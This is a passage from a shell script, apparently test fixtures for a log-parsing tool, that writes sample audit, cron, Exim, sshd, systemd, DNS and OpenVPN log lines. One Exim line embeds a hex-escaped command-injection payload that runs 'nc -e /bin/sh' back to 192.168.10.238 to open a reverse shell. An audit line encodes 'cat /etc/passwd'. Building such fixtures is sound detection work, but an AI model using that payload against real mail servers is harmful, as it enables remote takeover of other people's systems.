hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=failed'" >> $LOGFILE echo "audispd: type=USER_AUTH msg=audit(1451403193.995:1835): pid=3380 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct=\"toor\" exe=\"/usr/sbin/sshd\" hostname=192.168.2.100 addr=192.168.2.100 terminal=ssh res=success'" >> $LOGFILE echo "audispd: type=USER_AVC msg=audit(1234567890.123:1234): Text" >> $LOGFILE echo "audispd: type=USER_CHAUTHTOK msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_CMD msg=audit(1450785575.705:3316357): user pid=21619 uid=0 auid=526 msg='cwd=\"/home/hi\" cmd=\"/bin/bash\" (terminal=pts/0 res=success)'" >> $LOGFILE echo "audispd: type=USER_END msg=audit(1450767601.813:3296218): user pid=15764 uid=0 auid=0 msg='PAM: session close acct=\"root\" : exe=\"/usr/sbin/crond\" (hostname=?, addr=?, terminal=cron res=success)'" >> $LOGFILE echo "audispd: type=USER_ERR msg=audit(1450770602.157:3300444): user pid=16643 uid=0 auid=4294967295 msg='PAM: bad_ident acct="?" : exe=\"/usr/sbin/sshd\" (hostname=111.111.211.38, addr=111.111.211.38, terminal=ssh res=failed)'" >> $LOGFILE echo "audispd: type=USER_LABELED_EXPORT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_LOGIN msg=audit(1450770603.209:3300446): user pid=16649 uid=0 auid=4294967295 msg='acct=\"root\": exe=\"/usr/sbin/sshd\" (hostname=?, addr=11.111.53.58, terminal=sshd res=failed)'" >> $LOGFILE echo "audispd: type=USER_LOGOUT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_MAC_POLICY_LOAD msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_MGMT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_ROLE_CHANGE msg=audit(1280266360.845:51): user pid=1978 uid=0 auid=500 subj=system_u:system_r:local_login_t:s0-s0:c0.c1023 msg='pam: default-context=user_u:system_r:unconfined_t:s0 selected-context=user_u:system_r:unconfined_t:s0: exe=\"/bin/login\" (hostname=?, addr=?, terminal=tty1 res=success)'" >> $LOGFILE echo "audispd: type=USER_SELINUX_ERR msg=audit(1311948547.151:138): Text" >> $LOGFILE echo "audispd: type=USER_START msg=audit(1450771201.437:3301540): user pid=16878 uid=0 auid=0 msg='PAM: session open acct=\"root\" : exe=\"/usr/sbin/crond\" (hostname=?, addr=?, terminal=cron res=success)'" >> $LOGFILE echo "audispd: type=USER_TTY msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USER_UNLABELED_EXPORT msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=USYS_CONFIG msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_CONTROL msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_MACHINE_ID msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audispd: type=VIRT_RESOURCE msg=audit(1450770603.209:3300446): Text" >> $LOGFILE echo "audisp-remote: queue is full - dropping event" >> $LOGFILE echo "audispd: queue is full - dropping event" >> $LOGFILE echo "audispd: type=UNKNOWN[1327] msg=audit(1522927552.749:917): proctitle=636174002F6574632F706173737764" >> $LOGFILE ;; CronParsingModel) echo "CRON[25537]: (root) CMD ping 8.8.8.8" > $LOGFILE echo "CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)" >> $LOGFILE echo "CRON[12461]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)" >> $LOGFILE echo "CRON[12460]: pam_unix(cron:session): session opened for user root by (uid=0)" >> $LOGFILE echo "CRON[13229]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)" >> $LOGFILE echo "CRON[14368]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)" >> $LOGFILE ;; EximGenericParsingModel) echo "2020-02-29 00:04:25 Start queue run: pid=31912" > $LOGFILE echo "2020-02-29 00:34:25 End queue run: pid=32425" >> $LOGFILE echo "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" >> $LOGFILE echo "2020-03-04 19:21:48 VRFY failed for boyce@cup.com H=(x) [192.168.10.238]" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi <= trula@mail.cup.com U=www-data P=local S=8714 id=20200304192508.Horde.g3OQpszuommgdrQpHrx6wIc@mail.cup.com" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi => irwin R=local_user T=mail_spool" >> $LOGFILE echo '2020-03-04 19:36:19 1j9ZoZ-0002Jk-9W ** ${run{\x2fbin\x2fsh\t-c\t\x22nc\t-e\t\x2fbin\x2fsh\t192.168.10.238\t9963\x22}}@localhost: Too many "Received" headers - suspected mail loop' >> $LOGFILE echo "2020-03-04 19:36:57 1j9ZpB-0002KN-QF Completed" >> $LOGFILE echo "2020-03-04 20:04:25 1j9ZoZ-0002Jk-9W Message is frozen" >> $LOGFILE echo "2020-03-04 19:38:19 1j9ZoZ-0002Jk-9W Frozen (delivery error message)" >> $LOGFILE # following examples are covering exim failure message types. The examples are taken from # https://forums.cpanel.net/resources/reading-and-understanding-the-exim-main_log.383/ echo "2014-09-29 21:27:08 1XYdJu-002e6P-9F SMTP error from remote mail server after MAIL FROM: SIZE=6601: host mta5.am0.yahoodns.net [66.196.118.240]: 421 4.7.0 [GL01] Message from (184.171.253.133) temporarily deferred - 4.16.50. Please refer to http://postmaster.yahoo.com/errors/postmaster-21.html" >> $LOGFILE echo "2020-04-28 22:08:03 1m1x23-2011cZ-MN H=mta7.am0.yahoodns.net [67.195.228.106]: SMTP error from remote mail server after pipelined MAIL FROM: SIZE=1758: 421 4.7.0 [TSS04] Messages from 184.171.253.133 temporarily deferred due to unexpected volume or user complaints - 4.16.55.1; see https://postmaster.verizonmedia.com/error-codes" >> $LOGFILE echo "2014-09-12 08:01:12 1XSLn4-003Fa1-OX SMTP error from remote mail server after end of data: host gmail-smtp-in.l.google.com [173.194.66.27]: 421-4.7.0 [77.69.28.195 15] Our system has detected an unusual rate of\n421-4.7.0 unsolicited mail originating from your IP address. To protect our\n421-4.7.0 users from spam, mail sent from your IP address has been temporarily\n421-4.7.0 rate limited. Please visit\n421-4.7.0 http://www.google.com/mail/help/bulk_mail.html to review our Bulk\n421 4.7.0 Email Senders Guidelines. q4si1448293wij.85 - gsmtp" >> $LOGFILE echo "2014-09-18 13:44:19 1XUb4M-000v5R-6R SMTP error from remote mail server after MAIL FROM: SIZE=1811: host mta7.am0.yahoodns.net [66.66.66.66]: 421 4.7.1 [TS03] All messages from 5.196.113.212 will be permanently deferred; Retrying will NOT succeed. See http://postmaster.yahoo.com/421-ts03.html" >> $LOGFILE echo "TO:: host mx.someaddress.com [20.20.20.20]: 450 4.7.1 Client host rejected: cannot find your hostname, [20.20.20.20] 2014-09-21 16:06:05 1XUKFa-0003bb-EM ** someone@someaddress>: retry timeout exceeded" >> $LOGFILE echo "2014-10-10 10:25:01 1XcKLM-003IGU-Fr SMTP error from remote mail server after RCPT TO:: host pro-mail-mx-002.bol.com [20.20.20.20]: 450 4.7.1 Service unavailable" >> $LOGFILE echo "2014-09-24 12:59:49 1XWqqy-00028x-FK == test@badluckbryan.com R=lookuphost T=remote_smtp defer (-44): SMTP error from remote mail server after RCPT TO:: host gylsystems.com [69.69.69.69]: 451 Temporary local problem - please try later" >> $LOGFILE echo "2014-11-24 11:25:33 H=localhost (mail.fictional.example) [::1]:49956 sender verify defer for : require_files: error for /home/aaron/etc/domain.com: Permission denied" >> $LOGFILE echo "2014-11-24 11:25:33 H=localhost (srv-hs1.netsons.net) [::1]:49956 F= A=dovecot_login:aaron@domain.com temporarily rejected RCPT : Could not complete sender verify" >> $LOGFILE echo "2014-09-13 11:37:53 1XSdCz-00049U-5A ==aaron@domain.com R=lookuphost T=remote_smtp defer (-44): SMTP error from remote mail server after RCPT TO:: host mail.fictional.example [10.5.40.204]: 452 Domain size limit exceeded" >> $LOGFILE echo "2014-08-31 08:43:16 1XO5PX-0006SC-Qa ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after RCPT TO:: host mail.domain.com [10.5.40.204]: 550-Verification for \n550-The mail server could not deliver mail to garfield@domain.com. The account or domain may not exist, they may be blacklisted, or missing the proper dns entries.\n550 Sender verify failed" >> $LOGFILE echo "SMTP error from remote mail server after RCPT TO:: host mail.fictional.example[10.5.40.204]: 550-Sender has no A, AAAA, or MX DNS records. mail.fictional.example\n550 l mail.fictional.example\nVerify the zone file in /etc/named for the correct information. If it appear correct, you can run named-checkzone domain.com domain.com.db to verify if named is able to load the zone." >> $LOGFILE echo "Diagnostic-Code: X-Postfix; host mail1.domain.com [10.5.40.204] said: 550 5.7.1 Message rejected due to content restrictions (in reply to end of DATA command)\nWhen you see an error such as 550 5.7.1" >> $LOGFILE echo "Final-Recipient: rfc822;aaron@domain.com\nAction: failed\nStatus: 5.5.0\nDiagnostic-Code: smtp;550-Please turn on SMTP Authentication in your mail client.\n550-mail.fictional.example [10.5.40.204]:58133 is not permitted to relay 550 through this server without authentication." >> $LOGFILE echo "DHE-RSA-AES256-SHA:256: SMTP error from remote mail server after MAIL FROM: SIZE=1834: host mail.fictional.example [10.5.40.204..212]: 550 \"REJECTED - Bad HELO - Host impersonating [mail.fictional2.example]\"" >> $LOGFILE echo "2014-08-31 08:43:16 1XO5PY-0006SO-GS <= <> R=1XO5PX-0006SC-Qa U=mailnull P=local S=1951 T=\"Mail delivery failed: returning message to sender\" for aaron@domain.com" >> $LOGFILE echo "SMTP error from remote mail server after MAIL FROM:: host mail.fictional.example [10.5.40.204]: 553 sorry, your domain does not exists." >> $LOGFILE echo "2014-11-26 10:26:32 1XtYro-004Ecv-65 ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after MAIL FROM: SIZE=1604: host mail.fictional.example [10.5.40.204]: 553 unable to verify address\nVerify that SMPT authentication has been enabled." >> $LOGFILE echo "[15:03:30 hosts5 root /var/log]cPs# grep 1XeRdP-0006JC-FO exim_mainlog 2014-10-15 12:41:11 1XeRdP-0006JC-FO <= <> R=1XeRdF-0006HI-EY U=mailnull P=local S=5445 T=\"Mail delivery failed: returning message to sender\" for aaron@domain.com 2014-10-15 12:41:11 cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1XeRdP-0006JC-FO 2014-10-15 12:42:12 1XeRdP-0006JC-FO ** aaron@domain.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after end of data: host mail.fictional.example [10.5.40.204]: 554 rejected due to spam content" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS H=mail.fictional.example [10.5.40.204]:4779 Warning: \"SpamAssassin as marka22 detected message as spam (11.0)\"" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS <=10.5.40.204 H=mail.fictional.example[10.5.40.204]:4779 P=esmtp S=491878 id=dos45yx4zbmri7f@domain.com T="Payment confirmation: 7037487121" for aaron@domain.net [" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS => aaron R=virtual_user_spam T=virtual_userdelivery_spam" >> $LOGFILE echo "2014-10-01 15:12:26 1XZKdg-0001g3-JS Completed 2014-10-01 15:30:35 1XZKvG-0002HW-ML H=(12-12-12-12.domain.net [10.5.40.204]:65376 Warning: \"SpamAssassin as marka22 detected message as spam (7.2)\"" >> $LOGFILE echo "2014-10-01 15:30:35 1XZKvG-0002HW-ML <= item@something.net H=(12-12-12-12.domain.net [10.5.40.204]:65376 P=esmtp S=519381 id=dos45yx4zbmri7f@domain.com T=\"Payment confirmation: 7037487121\" for mark@domain.com 2014-10-01 15:30:35 1XZKvG-0002HW-ML => mark R=virtual_user_spam T=virtual_userdelivery_spam" >> $LOGFILE echo "2014-10-01 15:30:35 1XZKvG-0002HW-ML Completed" >> $LOGFILE echo "2014-09-10 13:06:55 1XRlM6-003yMv-KG H=mail.fictional.example[10.5.40.204]:46793 Warning: Message has been scanned: no virus or other harmful content was found" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG H=mail.fictional.example[10.5.40.204]:46793 Warning: \"SpamAssassin as cpaneleximscanner detected OUTGOING smtp message as NOT spam (-0.1)\"" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG <= bob@bob.com H=mail.fictional.example [10.5.40.204]:46793 P=esmtpsa X=TLSv1:AES128-SHA:128 A=dovecot_login:aaron@domain.com S=18635 T=\"14\\\" plates\" for live@somedomain.com" >> $LOGFILE echo "2014-09-10 13:06:56 1XRlM6-003yMv-KG SMTP connection outbound 1410368816 1XRlM6-003yMv-KG domain.com live@somedomain.com" >> $LOGFILE echo "2014-09-10 13:07:22 1XRlM6-003yMv-KG => live@somedomain.com R=dkim_lookuphost T=dkim_remote_smtp H=mail.fictional.example [10.5.40.204] X=TLSv1:DHE-RSA-AES256-SHA:256 C=\"250 OK id=1XRlMC-0006w5-F4\" 2014-09-10 13:07:22 1XRlM6-003yMv-KG Completed" >> $LOGFILE echo "2014-11-06 09:14:13 1XmNp0-0005Qp-MR H=mail-qg0-f68.google.com [10.5.40.204]:42603 Warning: \"SpamAssassin as sfgthib detected message as spam (998.0)\" 2014-11-06 09:14:13 1XmNp0-0005Qp-MR H=mail-qg0-f68.google.com [10.5.40.204]:42603 Warning: Message has been scanned: no virus or other harmful content was found" >> $LOGFILE echo "2014-11-06 09:14:13 1XmNp0-0005Qp-MR <= cpaneltest@gmail.com H=mail.fictional.example [10.5.40.204]:42603 P=esmtps X=TLSv1:RC4-SHA:128 S=3411 id=CAPtYmmQYRDb38yTmnA_ULZVjnKVOdtu6yw-HapGmjBCAk6rYYw@mail.gmail.com T=\"test\" for aaron@domain.com" >> $LOGFILE ;; KernelMsgParsingModel) echo "kernel: martian source 192.168.12.197 from 192.168.12.198, on dev bondib0" > $LOGFILE echo "kernel: martian source 192.168.1.255 from 192.168.1.251, on dev eth3" >> $LOGFILE echo "kernel: ll header: ff:ff:ff:ff:ff:ff:00:18:f8:0e:81:93:08:00" >> $LOGFILE echo "kernel: martian source 192.168.12.197 from 192.168.12.198, on dev bondib0" >> $LOGFILE echo "kernel: ll header: 00000000: ff ff ff ff ff ff 00 50 56 ad 59 09 08 00 .......PV.Y..." >> $LOGFILE echo "kernel: ll header: 00000000: ff ff ff ff ff ff a6 2c 90 bb 31 e9 08 06 .......,..1..." >> $LOGFILE ;; NtpParsingModel) echo "ntpd[8457]: Listen and drop on 0 v6wildcard [::]:123" > $LOGFILE echo "ntpd[8457]: Listen and drop on 1 v4wildcard 0.0.0.0:123" >> $LOGFILE echo "ntpd[8457]: Listen normally on 2 lo 127.0.0.1:123" >> $LOGFILE echo "ntpd[8457]: Listen normally on 3 eth0 1.2.2.19:123" >> $LOGFILE echo "ntpd[8457]: Listening on routing socket on fd #20 for interface updates" >> $LOGFILE echo "ntpd[21152]: logging to file /var/log/ntplog" >> $LOGFILE echo "ntpd[22760]: Soliciting pool server 78.41.116.113" >> $LOGFILE echo "ntpd[23165]: ntpd 4.2.8p12@1.3728-o (1): Starting" >> $LOGFILE echo "ntpd[23165]: Command line: ntpd" >> $LOGFILE echo "ntpd[23165]: must be run as root, not uid 1000" >> $LOGFILE echo "ntpd[23170]: proto: precision = 0.045 usec (-24)" >> $LOGFILE echo "ntpd[23170]: leapsecond file ('/usr/share/zoneinfo/leap-seconds.list'): good hash signature" >> $LOGFILE echo "ntpd[23170]: leapsecond file ('/usr/share/zoneinfo/leap-seconds.list'): loaded, expire=2021-12-28T00:00:00Z last=2017-01-01T00:00:00Z ofs=37" >> $LOGFILE echo "ntpd[23170]: unable to bind to wildcard address :: - another process may be running - EXITING" >> $LOGFILE ;; RsyslogParsingModel) echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.4.2\" x-pid=\"1812\" x-info=\"http://www.rsyslog.com\"] rsyslogd was HUPed" > $LOGFILE echo "rsyslogd0: action 'action 17' resumed (module 'builtin:ompipe') [try http://www.rsyslog.com/e/0 ]" >> $LOGFILE echo "rsyslogd-2359: action 'action 17' resumed (module 'builtin:ompipe') [try http://www.rsyslog.com/e/2359 ]" >> $LOGFILE echo "rsyslogd-2007: action 'action 17' suspended, next retry is Sun May 24 06:56:28 2015 [try http://www.rsyslog.com/e/2007 ]" >> $LOGFILE echo "rsyslogd: rsyslogd's groupid changed to 109" >> $LOGFILE echo "rsyslogd: rsyslogd's userid changed to 104" >> $LOGFILE echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.2001.0\" x-pid=\"28018\" x-info=\"https://www.rsyslog.com\"] start" >> $LOGFILE echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.2001.0\" x-pid=\"542\" x-info=\"https://www.rsyslog.com\"] rsyslogd was HUPed" >> $LOGFILE echo "rsyslogd-2222: command 'KLogPermitNonKernelFacility' is currently not permitted - did you already set it via a RainerScript command (v6+ config)? [v8.16.0 try http://www.rsyslog.com/e/2222 ]" >> $LOGFILE ;; SshdParsingModel) echo "sshd[35618]: Server listening on 0.0.0.0 port 22." > $LOGFILE echo "sshd[35619]: Failed password for someuser from 1.1.1.1 port 1372 ssh2" >> $LOGFILE echo "sshd[35619]: Accepted password for someuser from 1.1.1.1 port 1372 ssh2" >> $LOGFILE echo "sshd[36108]: Accepted publickey for someuser from 1.1.1.2 port 51590 ssh2" >> $LOGFILE echo "sshd[54798]: error: maximum authentication attempts exceeded for root from 122.121.51.193 port 59928 ssh2 [preauth]" >> $LOGFILE echo "sshd[54798]: Disconnecting authenticating user root 122.121.51.193 port 59928: Too many authentication failures [preauth]" >> $LOGFILE echo "sshd[5197]: Accepted publickey for fred from 192.0.2.60 port 59915 ssh2: RSA SHA256:5xyQ+PG1Z3CIiShclJ2iNya5TOdKDgE/HrOXr21IdOo" >> $LOGFILE echo "sshd[50140]: Accepted publickey for fred from 192.0.2.60 port 44456 ssh2: ECDSA-CERT SHA256:qGl9KiyXrG6mIOo1CT01oHUvod7Ngs5VMHM14DTbxzI ID foobar (serial 9624) CA ED25519 SHA256:fZ6L7TlBLqf1pGWzkcQMQMFZ+aGgrtYgRM90XO0gzZ8" >> $LOGFILE echo "sshd[5104]: Accepted publickey for fred from 192.0.2.60 port 60594 ssh2: RSA e8:31:68:c7:01:2d:25:20:36:8f:50:5d:f9:ee:70:4c" >> $LOGFILE echo "sshd[252]: Connection closed by authenticating user fred 192.0.2.60 port 44470 [preauth]" >> $LOGFILE echo "sshd[90593]: fatal: Timeout before authentication for 192.0.2.60 port 44718" >> $LOGFILE echo "sshd[252]: error: Certificate invalid: expired" >> $LOGFILE echo "sshd[90593]: error: Certificate invalid: not yet valid" >> $LOGFILE echo "sshd[98884]: error: Certificate invalid: name is not a listed principal" >> $LOGFILE echo "sshd[2420]: cert: Authentication tried for fred with valid certificate but not from a permitted source address (192.0.2.61)." >> $LOGFILE echo "sshd[2420]: error: Refused by certificate options" >> $LOGFILE echo "sshd[26299]: Failed none for fred from 192.0.2.60 port 47366 ssh2" >> $LOGFILE echo "sshd[26299]: User child is on pid 21613" >> $LOGFILE echo "sshd[21613]: Changed root directory to \"/home/fred\"" >> $LOGFILE echo "sshd[21613]: subsystem request for sftp" >> $LOGFILE echo "sshd[83709]: packet_write_poll: Connection from 192.0.2.97 port 57608: Host is down" >> $LOGFILE echo "sshd[9075]: debug1: Got 100/147 for keepalive" >> $LOGFILE echo "sshd[73960]: debug2: channel 0: request keepalive@openssh.com confirm 1" >> $LOGFILE echo "sshd[73960]: debug3: send packet: type 98" >> $LOGFILE echo "sshd[73960]: debug3: receive packet: type 100" >> $LOGFILE echo "sshd[73960]: debug1: Got 100/22 for keepalive" >> $LOGFILE echo "sshd[15780]: debug1: do_cleanup" >> $LOGFILE echo "sshd[48675]: debug1: session_pty_cleanup: session 0 release /dev/ttyp0" >> $LOGFILE echo "sshd[29235]: error: Authentication key RSA SHA256:jXEPmu4thnubqPUDcKDs31MOVLQJH6FfF1XSGT748jQ revoked by file /etc/ssh/ssh_revoked_keys" >> $LOGFILE echo "sshd[38594]: Invalid user ubnt from 201.179.249.231 port 52471" >> $LOGFILE echo "sshd[38594]: Failed password for invalid user ubnt from 201.179.249.231 port 52471 ssh2" >> $LOGFILE echo "sshd[38594]: error: maximum authentication attempts exceeded for invalid user ubnt from 201.179.249.231 port 52471 ssh2 [preauth]" >> $LOGFILE echo "sshd[38594]: Disconnecting invalid user ubnt 201.179.249.231 port 52471: Too many authentication failures [preauth]" >> $LOGFILE echo "sshd[93126]: Failed none for invalid user admin from 125.64.94.136 port 27586 ssh2" >> $LOGFILE echo "sshd[9265]: Accepted password for fred from 127.0.0.1 port 40426 ssh2" >> $LOGFILE echo "sshd[5613]: Invalid user cloud from ::1 port 57404" >> $LOGFILE echo "sshd[5613]: Failed password for invalid user cloud from ::1 port 57404 ssh2" >> $LOGFILE echo "sshd[5613]: Connection closed by invalid user cloud ::1 port 57404 [preauth]" >> $LOGFILE echo "sshd[3545]: pam_succeed_if(sshd:auth): requirement \"uid >= 1000\" not met by user \"root\"" >> $LOGFILE echo "sshd[3545]: pam_unix(sshd:session): session opened for user root by (uid=0)" >> $LOGFILE echo "sshd[3545]: Received disconnect from ::1: 11: disconnected by user" >> $LOGFILE echo "sshd[3545]: pam_unix(sshd:session): session closed for user root" >> $LOGFILE echo "sshd[4182]: error: Could not load host key: /etc/ssh/ssh_host_dsa_key" >> $LOGFILE ;; SsmtpParsingModel) echo "sSMTP[24391]: /usr/sbin/sendmail sent mail for raul" > $LOGFILE ;; SuSessionParsingModel) echo "su[10710]: Successful su for user by root" > $LOGFILE echo "su[10710]: + ??? root:user" >> $LOGFILE echo "su[10710]: pam_unix(su:session): session opened for user user by (uid=0)" >> $LOGFILE echo "su[10710]: pam_unix(su:session): session closed for user user" >> $LOGFILE ;; SyslogPreambleModel) echo "Feb 29 00:01:41 mail-0 " > $LOGFILE echo "Mar 1 06:25:38 mail " >> $LOGFILE ;; SystemdParsingModel) echo "systemd[1]: phpsessionclean.service: Succeeded." > $LOGFILE echo "systemd[1]: Finished Clean php session files." >> $LOGFILE echo "systemd[1]: logrotate.service: Succeeded." >> $LOGFILE echo "systemd[1]: Finished Rotate log files." >> $LOGFILE echo "systemd[1]: man-db.service: Succeeded." >> $LOGFILE echo "systemd[1]: Finished Daily man-db regeneration." >> $LOGFILE echo "systemd[1]: Finished Ubuntu Advantage APT and MOTD Messages." >> $LOGFILE echo "systemd[1]: Finished Refresh fwupd metadata and update motd." >> $LOGFILE echo "systemd[1]: Finished Daily apt download activities." >> $LOGFILE echo "systemd[1]: Starting Daily apt upgrade and clean activities..." >> $LOGFILE echo "systemd[1]: Finished Daily apt upgrade and clean activities." >> $LOGFILE echo "systemd[1]: anacron.service: Killing process 39123 (update-notifier) with signal SIGKILL." >> $LOGFILE echo "systemd[1]: Starting PackageKit Daemon..." >> $LOGFILE echo "systemd[1]: Started PackageKit Daemon." >> $LOGFILE echo "systemd[1]: Reloading." >> $LOGFILE echo "systemd[2318]: var-lib-docker-overlay2-check\x2doverlayfs\x2dsupport037009939-merged.mount: Succeeded." >> $LOGFILE echo "systemd[2318]: Started VTE child process 54668 launched by gnome-terminal-server process 2984." >> $LOGFILE echo "systemd-logind[2445]: New session 2172664 of user dbi_backup." >> $LOGFILE echo "systemd-logind[760]: Session 230 logged out. Waiting for processes to exit." >> $LOGFILE echo "systemd-logind[760]: Removed session 230." >> $LOGFILE echo "systemd-logind[760]: New session 231 of user egoebelbecker." >> $LOGFILE echo "systemd-logind[467]: Failed to abandon session scope: Transport endpoint is not connected" >> $LOGFILE ;; TomcatParsingModel) # model is not updated to the latest version and therefore not tested. rm $LOGFILE touch $LOGFILE ;; UlogdParsingModel) echo "ulogd[4655]: id=\"2001\" severity=\"info\" sys=\"SecureNet\" sub=\"packetfilter\" name=\"Packet dropped\" action=\"drop\" fwrule=\"60001\" initf=\"eth0\" srcmac=\"******\" dstmac=\"******x\" srcip=\"10.64.0.22\" dstip=\"10.64.0.10\" proto=\"6\" length=\"52\" tos=\"0x00\" prec=\"0x00\" ttl=\"128\" srcport=\"443\" dstport=\"56174\" tcpflags=\"ACK FIN\"" > $LOGFILE echo "ulogd[4655]: id=\"2001\" severity=\"info\" sys=\"SecureNet\" sub=\"packetfilter\" name=\"Packet dropped\" action=\"drop\" fwrule=\"60001\" initf=\"eth0\" srcmac=\"******xx\" dstmac=\"******x\" srcip=\"10.64.0.22\" dstip=\"10.64.0.10\" proto=\"6\" length=\"153\" tos=\"0x00\" prec=\"0x00\" ttl=\"128\" srcport=\"443\" dstport=\"56174\" tcpflags=\"ACK PSH FIN\"" >> $LOGFILE ;; DnsParsingModel) echo "Jan 20 11:21:42 dnsmasq[3326]: started, version 2.79 cachesize 150" > $LOGFILE echo "Jan 20 11:21:42 dnsmasq[3326]: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth nettlehash DNSSEC loop-detect inotify" >> $LOGFILE echo "Jan 20 11:21:42 dnsmasq[3326]: using nameserver 8.8.8.8#53" >> $LOGFILE echo "Jan 20 11:21:42 dnsmasq[3326]: using nameserver 192.168.230.122#53 for domain email-19.kennedy-mendoza.info" >> $LOGFILE echo "Jan 20 11:21:42 dnsmasq[3326]: read /etc/hosts - 7 addresses" >> $LOGFILE echo "Jan 20 11:21:55 dnsmasq[3414]: query[SRV] _http._tcp.archive.ubuntu.com from 192.168.230.4" >> $LOGFILE echo "Jan 20 11:21:55 dnsmasq[3414]: forwarded _http._tcp.archive.ubuntu.com to 8.8.8.8" >> $LOGFILE echo "Jan 20 11:21:55 dnsmasq[3414]: reply archive.ubuntu.com is 91.189.88.152" >> $LOGFILE echo "Jan 20 11:23:40 dnsmasq[3326]: cached debian.map.fastlydns.net is 199.232.138.132" >> $LOGFILE echo "Jan 20 11:21:42 inet-dns dnsmasq[1969]: exiting on receipt of SIGTERM" >> $LOGFILE echo "Jan 20 13:47:14 dnsmasq[3326]: nameserver 127.0.0.1 refused to do a recursive query" >> $LOGFILE echo "Jan 21 07:05:20 dnsmasq[3468]: failed to access /etc/dnsmasq.d/dnsmasq-resolv.conf: No such file or directory" >> $LOGFILE echo "Jan 24 03:56:53 dnsmasq[15084]: config version.bind is " >> $LOGFILE ;; OpenVpnParsingModel) echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 TLS: soft reset sec=3308/3308 bytes=45748/-1 pkts=649/0" > $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 VERIFY OK: depth=1, C=AT, ST=Vienna, L=Vienna, O=Some Organisation GmbH, CN=OpenVPN CA, emailAddress=admin@organisation.cyberrange.at" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 VERIFY KU OK" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 Validating certificate extended key usage" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 ++ Certificate has EKU (str) TLS Web Client Authentication, expects TLS Web Client Authentication" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_VER=2.4.4" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_PLAT=linux" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_PROTO=2" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_LZ4=1" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_COMP_STUB=1" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_TCPNL=1" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key" >> $LOGFILE echo "2022-01-21 03:49:44 jhall/192.168.230.165:46011 TLS: soft reset sec=3309/3308 bytes=45892/-1 pkts=651/0" >> $LOGFILE echo "2022-01-21 06:30:01 192.168.230.95:60795 TLS: Initial packet from [AF_INET]192.168.230.95:60795, sid=30d47335 8140d551" >> $LOGFILE echo "2022-01-21 06:30:01 192.168.230.95:60795 peer info: IV_NCP=2" >> $LOGFILE echo "2022-01-21 06:30:01 192.168.230.95:60795 [twhite] Peer Connection Initiated with [AF_INET]192.168.230.95:60795" >> $LOGFILE echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI_sva: pool returned IPv4=10.9.0.6, IPv6=(Not enabled)" >> $LOGFILE echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI: Learn: 10.9.0.6 -> twhite/192.168.230.95:60795" >> $LOGFILE echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI: primary virtual IP for twhite/192.168.230.95:60795: 10.9.0.6" >> $LOGFILE echo "2022-01-21 06:30:03 twhite/192.168.230.95:60795 PUSH: Received control message: 'PUSH_REQUEST'" >> $LOGFILE echo "2022-01-21 06:30:03 twhite/192.168.230.95:60795 SENT CONTROL [twhite]: 'PUSH_REPLY,redirect-gateway def1,block-outside-dns,route 10.9.0.1,topology net30,ping 10,ping-restart 120,ifconfig 10.9.0.6 10.9.0.5,peer-id 0,cipher AES-256-CBC' (status=1)" >> $LOGFILE echo "2022-01-21 08:09:33 